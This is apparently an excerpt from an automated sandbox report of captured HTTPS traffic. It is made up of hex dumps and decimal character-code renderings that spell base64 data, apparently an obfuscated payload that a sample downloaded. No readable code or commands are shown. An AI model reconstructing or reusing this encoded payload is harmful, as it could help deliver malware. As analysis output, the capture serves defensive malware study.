                    Data Ascii: 81 0 120 0 56 0 52 0 87 0 98 0 51 0 119 0 119 0 65 0 81 0 100 0 81 0 87 0 76 0 102 0 107 0 84 0 114 0 65 0 52 0 116 0 43 0 83 0 80 0 43 0 50 0 111 0 65 0 73 0 65 0 65 0 79 0 104 0 43 0 120 0 118 0 47 0 47 0 86 0 50 0 103 0 65 0 87 0 65 0 65 0 65 0 105 0
                    2021-10-26 16:59:46 UTC4688INData Raw: 20 31 30 30 20 30 20 31 31 39 20 30 20 31 30 35 20 30 20 37 36 20 30 20 31 32 32 20 30 20 34 37 20 30 20 35 37 20 30 20 35 30 20 30 20 38 39 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 32 20 30 20 31 32 31 20 30 20 37 36 20 30 20 38 34 20 30 20 31 30 32 20 30 20 31 30 34 20 30 20 38 34 20 30 20 34 37 20 30 20 35 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 35 34 20 30 20 37 31 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 36 20 30 20 31 30 34 20 30 20 38 31 20 30 20 38 36 20 30 20 34 33 20 30 20 31 30 36 20 30 20 31 31 30
                    Data Ascii: 100 0 119 0 105 0 76 0 122 0 47 0 57 0 50 0 89 0 71 0 111 0 65 0 47 0 120 0 68 0 47 0 100 0 102 0 121 0 76 0 84 0 102 0 104 0 84 0 47 0 55 0 97 0 103 0 65 0 103 0 65 0 65 0 54 0 71 0 80 0 68 0 47 0 47 0 43 0 68 0 120 0 66 0 104 0 81 0 86 0 43 0 106 0 110
                    2021-10-26 16:59:46 UTC4692INData Raw: 20 36 38 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 36 39 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 36 35 20 30 20 38 30 20 30 20 35 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 36 36 20 30 20 31 31 33 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 37 36 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 35 20 30 20 38 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 38 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 38 20 30 20 31 31 35 20 30 20 31 31 30 20
                    Data Ascii: 68 0 111 0 114 0 107 0 65 0 65 0 65 0 73 0 80 0 69 0 69 0 73 0 50 0 70 0 65 0 80 0 55 0 47 0 47 0 49 0 66 0 113 0 65 0 71 0 103 0 76 0 66 0 65 0 65 0 65 0 47 0 55 0 89 0 119 0 65 0 119 0 65 0 65 0 47 0 120 0 87 0 89 0 119 0 85 0 65 0 65 0 88 0 115 0 110
                    2021-10-26 16:59:46 UTC4703INData Raw: 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 32 20 30 20 31 30 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 37 20 30 20 31 31 33 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 34 39 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 39 38 20 30 20 35 30 20 30 20 31 31 31 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 34 20 30 20 36 39 20 30 20 39 39 20 30 20 35 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 33 20 30 20 38 39 20 30 20 31 31 31 20 30 20 35 30 20 30 20 37 30 20 30 20 31 30 31 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20
                    Data Ascii: 111 0 65 0 65 0 71 0 112 0 105 0 106 0 89 0 87 0 113 0 47 0 118 0 47 0 47 0 86 0 49 0 66 0 109 0 105 0 98 0 50 0 111 0 47 0 118 0 47 0 47 0 54 0 69 0 99 0 54 0 65 0 65 0 66 0 113 0 89 0 111 0 50 0 70 0 101 0 118 0 47 0 47 0 47 0 49 0 100 0 81 0 90 0 111
                    2021-10-26 16:59:46 UTC4719INData Raw: 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 34 20 30 20 38 32 20 30 20 36 37 20 30 20 38 31 20 30 20 39 39 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 36 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 34 37 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 37 36 20 30 20 38 35 20 30 20 38 34 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 30 37 20 30 20 37 30 20 30 20 37 33 20 30 20 31 30 38 20 30 20 36 39 20 30 20 37 34 20 30 20 36 37 20 30 20 36 38 20 30 20 34 37 20 30 20 31 31 36
                    Data Ascii: 67 0 65 0 65 0 67 0 74 0 82 0 67 0 81 0 99 0 47 0 120 0 86 0 65 0 119 0 69 0 65 0 65 0 97 0 103 0 47 0 47 0 70 0 101 0 122 0 66 0 81 0 65 0 67 0 76 0 76 0 85 0 84 0 65 0 81 0 65 0 66 0 81 0 47 0 51 0 81 0 107 0 70 0 73 0 108 0 69 0 74 0 67 0 68 0 47 0 116
                    2021-10-26 16:59:46 UTC4735INData Raw: 30 20 31 31 31 20 30 20 35 30 20 30 20 38 37 20 30 20 31 31 36 20 30 20 31 30 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 38 20 30 20 35 37 20 30 20 34 37 20 30 20 37 31 20 30 20 39 37 20 30 20 37 36 20 30 20 37 32 20 30 20 36 36 20 30 20 37 30 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 38 32 20 30 20 31 31 32 20 30 20 36 37 20 30 20 38 31 20 30 20 31 31 38 20 30 20 35 37 20 30 20 37 38 20 30 20 34 37 20 30 20 37 32 20 30 20 38 38 20 30 20 31 32 31 20 30 20 31 30 36 20 30 20 39 30 20 30 20 39 37 20 30 20 35 30 20 30 20 38 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 31 35 20 30 20 39 39 20 30 20 36 39 20 30 20 38 37 20 30 20 39 37 20 30 20 37 34 20 30 20 37 31 20 30
                    Data Ascii: 0 111 0 50 0 87 0 116 0 107 0 103 0 65 0 65 0 73 0 108 0 57 0 47 0 71 0 97 0 76 0 72 0 66 0 70 0 109 0 105 0 82 0 112 0 67 0 81 0 118 0 57 0 78 0 47 0 72 0 88 0 121 0 106 0 90 0 97 0 50 0 83 0 103 0 65 0 65 0 90 0 111 0 115 0 99 0 69 0 87 0 97 0 74 0 71 0
                    2021-10-26 16:59:46 UTC4751INData Raw: 20 38 35 20 30 20 38 31 20 30 20 31 30 37 20 30 20 36 39 20 30 20 36 35 20 30 20 34 33 20 30 20 36 39 20 30 20 31 32 31 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 34 39 20 30 20 37 37 20 30 20 37 34 20 30 20 36 36 20 30 20 38 32 20 30 20 38 32 20 30 20 39 37 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 36 20 30 20 36 37 20 30 20 38 33 20 30 20 37 33 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 36 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 38 35 20 30 20 36 38 20 30 20 35 32 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 34 33 20 30 20
                    Data Ascii: 85 0 81 0 107 0 69 0 65 0 43 0 69 0 121 0 65 0 69 0 65 0 65 0 73 0 49 0 77 0 74 0 66 0 82 0 82 0 97 0 65 0 67 0 65 0 65 0 65 0 67 0 78 0 106 0 67 0 83 0 73 0 67 0 65 0 65 0 65 0 85 0 86 0 68 0 47 0 70 0 85 0 68 0 52 0 81 0 65 0 67 0 70 0 119 0 65 0 43 0
                    2021-10-26 16:59:46 UTC4767INData Raw: 31 30 36 20 30 20 38 30 20 30 20 36 35 20 30 20 38 38 20 30 20 34 39 20 30 20 35 33 20 30 20 39 38 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 37 33 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 37 30 20 30 20 36 37 20 30 20 37 33 20 30 20 38 30 20 30 20 31 31 35 20 30 20 37 33 20 30 20 37 33 20 30 20 37 37 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 37 30 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 37 38 20 30 20 38 37 20 30 20 38 36 20 30 20 35 32 20 30 20 31 31 35 20 30 20 35 37 20 30 20 35 31 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 34 20
                    Data Ascii: 106 0 80 0 65 0 88 0 49 0 53 0 98 0 121 0 99 0 73 0 73 0 65 0 70 0 87 0 76 0 55 0 73 0 116 0 70 0 67 0 73 0 80 0 115 0 73 0 73 0 77 0 52 0 65 0 65 0 43 0 70 0 106 0 65 0 65 0 65 0 65 0 70 0 78 0 87 0 86 0 52 0 115 0 57 0 51 0 77 0 66 0 65 0 65 0 71 0 104
                    2021-10-26 16:59:46 UTC4783INData Raw: 37 20 30 20 35 36 20 30 20 36 36 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 37 30 20 30 20 37 31 20 30 20 37 33 20 30 20 31 31 35 20 30 20 34 39 20 30 20 39 38 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 39 20 30 20 39 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 33 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 30 20 30 20 38 34 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 38 36 20 30 20 35 31 20 30 20 31 31 31 20 30 20 34 37 20 30 20 35 37 20 30 20 39 30
                    Data Ascii: 7 0 56 0 66 0 65 0 73 0 116 0 70 0 71 0 73 0 115 0 49 0 98 0 77 0 66 0 65 0 65 0 71 0 111 0 69 0 97 0 65 0 65 0 81 0 65 0 65 0 67 0 47 0 105 0 73 0 73 0 65 0 65 0 70 0 100 0 84 0 47 0 51 0 85 0 77 0 105 0 85 0 88 0 115 0 105 0 86 0 51 0 111 0 47 0 57 0 90
                    2021-10-26 16:59:46 UTC4799INData Raw: 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 34 20 30 20 36 39 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 38 39 20 30 20 31 30 33 20 30 20 35 31 20 30 20 35 32 20 30 20 36 39 20 30 20 34 37 20 30 20 35 36 20 30 20 31 30 30 20 30 20 37 30 20 30 20 34 37 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 34 39 20 30 20 36 37 20 30 20 36 38 20 30 20 31 30 38 20 30 20 31 30 31 20 30 20 36 37 20 30 20 37 32 20 30 20 35 36 20 30 20 36 38 20 30 20 31 30 35 20 30 20 38 36 20 30 20 35 31 20 30 20 35 36 20 30 20 37 39 20 30 20 38 36 20 30 20 35 31 20 30 20 35 36 20 30 20 31 30 35 20 30 20 35 31 20 30 20 34 38 20 30 20 37 33 20 30 20 39 30
                    Data Ascii: 7 0 47 0 43 0 104 0 69 0 65 0 119 0 65 0 65 0 103 0 56 0 81 0 89 0 103 0 51 0 52 0 69 0 47 0 56 0 100 0 70 0 47 0 65 0 69 0 65 0 65 0 65 0 66 0 49 0 67 0 68 0 108 0 101 0 67 0 72 0 56 0 68 0 105 0 86 0 51 0 56 0 79 0 86 0 51 0 56 0 105 0 51 0 48 0 73 0 90
                    2021-10-26 16:59:46 UTC4815INData Raw: 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 37 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 35 34 20 30 20 35 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 33 20 30 20 37 39 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 34 20 30 20 39 38 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 39 39 20 30 20 35 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 30 20 30 20 37 39 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 34 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 37 39 20 30 20 35 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 31 31 37 20 30
                    Data Ascii: 0 65 0 65 0 65 0 65 0 73 0 76 0 117 0 65 0 65 0 67 0 54 0 55 0 103 0 65 0 65 0 113 0 79 0 52 0 65 0 65 0 74 0 98 0 117 0 65 0 65 0 68 0 99 0 55 0 81 0 65 0 65 0 100 0 79 0 52 0 65 0 65 0 71 0 84 0 117 0 65 0 65 0 66 0 79 0 55 0 103 0 65 0 65 0 80 0 117 0
                    2021-10-26 16:59:46 UTC4831INData Raw: 20 30 20 36 35 20 30 20 37 32 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 30 20 30 20 36 35 20 30 20 36 36 20 30 20 37 34 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 31 30 31 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20
                    Data Ascii: 0 65 0 72 0 85 0 65 0 99 0 119 0 66 0 48 0 65 0 71 0 85 0 65 0 90 0 65 0 66 0 74 0 65 0 71 0 52 0 65 0 99 0 119 0 66 0 48 0 65 0 71 0 69 0 65 0 98 0 65 0 66 0 115 0 65 0 71 0 85 0 65 0 99 0 103 0 65 0 117 0 65 0 71 0 85 0 65 0 101 0 65 0 66 0 108 0 65 0
                    2021-10-26 16:59:46 UTC4847INData Raw: 30 20 36 36 20 30 20 31 30 36 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 35 37 20 30 20 36 35 20 30 20 36 37 20 30 20 37 33 20 30 20 36 35 20 30 20 38 33 20 30 20 38 31 20 30 20 36 36 20 30 20 38 34 20 30 20 36 35 20 30 20 36 39 20 30 20 35 36 20 30 20 36 35 20 30 20 37 36 20 30 20 38 31 20 30 20 36 35 20 30 20 35 32 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 38 20 30 20 38 31 20 30 20 36 35 20 30 20 35 33 20 30 20 36 35 20 30 20 36 37 20 30 20 34 38 20 30 20 36 35 20 30 20 37 37 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 35 20
                    Data Ascii: 0 66 0 106 0 65 0 71 0 56 0 65 0 90 0 65 0 66 0 112 0 65 0 71 0 52 0 65 0 90 0 119 0 65 0 57 0 65 0 67 0 73 0 65 0 83 0 81 0 66 0 84 0 65 0 69 0 56 0 65 0 76 0 81 0 65 0 52 0 65 0 68 0 103 0 65 0 78 0 81 0 65 0 53 0 65 0 67 0 48 0 65 0 77 0 81 0 65 0 105
                    2021-10-26 16:59:46 UTC4863INData Raw: 30 33 20 30 20 36 35 20 30 20 31 32 31 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 39 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 35 20 30 20 35 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 39 20 30 20 36 35 20 30 20 37 31 20 30 20 39 39 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 35 20 30 20 35 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 39 20 30 20 36 35 20 30 20 37 32 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 30 20 30 20 38 31 20 30 20 36
                    Data Ascii: 03 0 65 0 121 0 65 0 70 0 103 0 65 0 65 0 65 0 65 0 109 0 65 0 71 0 119 0 65 0 100 0 65 0 65 0 55 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 109 0 65 0 71 0 99 0 65 0 100 0 65 0 65 0 55 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 109 0 65 0 72 0 69 0 65 0 100 0 81 0 6
                    2021-10-26 16:59:46 UTC4879INData Raw: 20 30 20 38 38 20 30 20 31 31 32 20 30 20 31 30 38 20 30 20 38 36 20 30 20 31 31 39 20 30 20 36 36 20 30 20 38 37 20 30 20 38 32 20 30 20 38 36 20 30 20 37 34 20 30 20 38 34 20 30 20 38 33 20 30 20 38 35 20 30 20 35 37 20 30 20 37 39 20 30 20 37 36 20 30 20 31 30 39 20 30 20 38 32 20 30 20 31 31 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 36 39 20 30 20 37 38 20 30 20 31 32 31 20 30 20 39 30 20 30 20 38 37 20 30 20 37 30 20 30 20 34 38 20 30 20 39 30 20 30 20 38 36 20 30 20 36 36 20 30 20 31 32 31 20 30 20 39 38 20 30 20 35 30 20 30 20 37 38 20 30 20 31 30 38 20 30 20 39 39 20 30 20 35 31 20 30 20 37 38 20 30 20 38 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 38 20 30 20 36 35 20 30 20 36 39 20
                    Data Ascii: 0 88 0 112 0 108 0 86 0 119 0 66 0 87 0 82 0 86 0 74 0 84 0 83 0 85 0 57 0 79 0 76 0 109 0 82 0 115 0 98 0 65 0 66 0 112 0 65 0 69 0 78 0 121 0 90 0 87 0 70 0 48 0 90 0 86 0 66 0 121 0 98 0 50 0 78 0 108 0 99 0 51 0 78 0 88 0 65 0 65 0 65 0 48 0 65 0 69
                    2021-10-26 16:59:46 UTC4895INData Raw: 38 39 20 30 20 38 38 20 30 20 38 32 20 30 20 31 30 38 20 30 20 38 34 20 30 20 37 31 20 30 20 35 37 20 30 20 31 31 30 20 30 20 39 30 20 30 20 35 30 20 30 20 38 36 20 30 20 31 30 37 20 30 20 38 34 20 30 20 35 30 20 30 20 35 33 20 30 20 38 36 20 30 20 39 39 20 30 20 35 30 20 30 20 38 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 39 20 30 20 36 37 20 30 20 38 35 20 30 20 31 30 39 20 30 20 38 36 20 30 20 35 30 20 30 20 39 30 20 30 20 38 38 20 30 20 37 34 20 30 20 34 38 20 30 20 38 36 20 30 20 37 31 20 30 20 35 37 20 30 20 38 34 20 30 20 39 30 20 30 20 38 37 20 30 20 31 32 30 20 30 20 31 30 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 33 20 30 20 36 35 20 30 20 36 39 20 30 20 37 38 20 30 20 31 31 35 20 30 20 39 38 20 30 20 35 31
                    Data Ascii: 89 0 88 0 82 0 108 0 84 0 71 0 57 0 110 0 90 0 50 0 86 0 107 0 84 0 50 0 53 0 86 0 99 0 50 0 86 0 121 0 65 0 66 0 89 0 67 0 85 0 109 0 86 0 50 0 90 0 88 0 74 0 48 0 86 0 71 0 57 0 84 0 90 0 87 0 120 0 109 0 65 0 65 0 65 0 43 0 65 0 69 0 78 0 115 0 98 0 51
                    2021-10-26 16:59:46 UTC4911INData Raw: 35 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 37 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 31 30 33 20 30 20 37 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30
                    Data Ascii: 5 0 67 0 81 0 81 0 65 0 65 0 68 0 103 0 71 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 69 0 65 0 67 0 81 0 81 0 65 0 65 0 69 0 103 0 71 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0
                    2021-10-26 16:59:46 UTC4927INData Raw: 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 32 20 30 20 31 30 39 20 30 20 31 32 30 20 30 20 39 37 20 30 20 31 31 38 20 30 20 38 35 20 30 20 31 31 36 20 30 20 37 36 20 30 20 31 31 38 20 30 20 38 35 20 30 20 31 31 36 20 30 20 37 36 20 30 20 31 30 33 20 30 20 38 34 20 30 20 38 31 20 30 20 34 38 20 30 20 31 31 39 20 30 20 39 37 20 30 20 37 39 20 30 20 31 30 36 20 30 20 31 31 32 20 30 20 36 38 20 30 20 39 39 20 30 20 35 31 20 30 20 31 31 34 20 30 20 38 38 20 30 20 37 38 20 30 20 31 32 32 20 30 20 31 32 32 20 30 20 31 31 35 20 30 20 35 35 20 30 20 37 39 20 30 20 34 33 20 30 20 31 31 38 20 30 20 31 31 34 20 30 20 35 34 20 30 20 35 34 20 30 20 34 33 20 30 20 31 31 38 20 30 20 31
                    Data Ascii: 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 112 0 109 0 120 0 97 0 118 0 85 0 116 0 76 0 118 0 85 0 116 0 76 0 103 0 84 0 81 0 48 0 119 0 97 0 79 0 106 0 112 0 68 0 99 0 51 0 114 0 88 0 78 0 122 0 122 0 115 0 55 0 79 0 43 0 118 0 114 0 54 0 54 0 43 0 118 0 1
                    2021-10-26 16:59:46 UTC4943INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 32 20 30 20 31 30 39 20 30 20 31 32 30 20 30 20 39 37 20 30 20 31 31 38 20 30 20 38 35 20 30 20 31 31 36 20 30 20 37 36 20 30 20 31 31 34 20 30 20 38 38 20 30 20 37 38 20 30 20 31 32 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 34 33 20 30 20 38 30 20 30 20 31 30 36 20 30 20 35 32 20 30 20 31 31 34
                    Data Ascii: 0 65 0 65 0 65 0 112 0 109 0 120 0 97 0 118 0 85 0 116 0 76 0 114 0 88 0 78 0 122 0 43 0 80 0 106 0 52 0 43 0 80 0 106 0 52 0 43 0 80 0 106 0 52 0 43 0 80 0 106 0 52 0 43 0 80 0 106 0 52 0 43 0 80 0 106 0 52 0 43 0 80 0 106 0 52 0 43 0 80 0 106 0 52 0 114
                    2021-10-26 16:59:46 UTC4959INData Raw: 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 36 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 37 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36
                    Data Ascii: 73 0 105 0 73 0 105 0 73 0 105 0 73 0 105 0 73 0 103 0 65 0 105 0 73 0 105 0 73 0 105 0 73 0 105 0 73 0 105 0 65 0 67 0 73 0 105 0 73 0 105 0 73 0 105 0 73 0 105 0 73 0 65 0 73 0 105 0 73 0 105 0 73 0 105 0 73 0 105 0 73 0 103 0 65 0 75 0 65 0 65 0 65 0 6
                    2021-10-26 16:59:46 UTC4975INData Raw: 35 20 30 20 34 37 20 30 20 34 37 20 30 20 35 35 20 30 20 31 30 32 20 30 20 31 31 39 20 30 20 38 30 20 30 20 34 37 20 30 20 34 33 20 30 20 35 31 20 30 20 35 36 20 30 20 36 38 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 36 20 30 20 34 37 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 35 35 20 30 20 31 30 32 20 30 20 31 31 39 20 30 20 38 30 20 30 20 34 37 20 30 20 35 35 20 30 20 37 35 20 30 20 38 39 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 38 36 20 30 20 38 31 20 30 20 31 31 39 20 30 20 37 32 20 30 20 34 38 20 30 20 38 30 20 30 20 38 34 20 30 20 31 30 33 20 30 20 37 31 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 38 30 20 30 20 31 31 33 20 30 20 34 38 20 30 20 31 30 32 20 30 20 34 37 20 30 20 31 31 34 20 30 20 35 35 20 30 20 37 37 20 30
